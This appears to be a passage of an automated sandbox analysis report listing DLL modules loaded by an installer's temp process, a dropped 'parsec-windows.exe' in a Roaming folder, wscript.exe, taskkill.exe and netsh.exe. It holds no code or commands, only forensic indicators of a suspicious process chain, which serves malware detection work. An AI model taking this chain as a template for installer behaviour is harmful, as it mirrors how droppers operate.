Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: winhttpcom.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
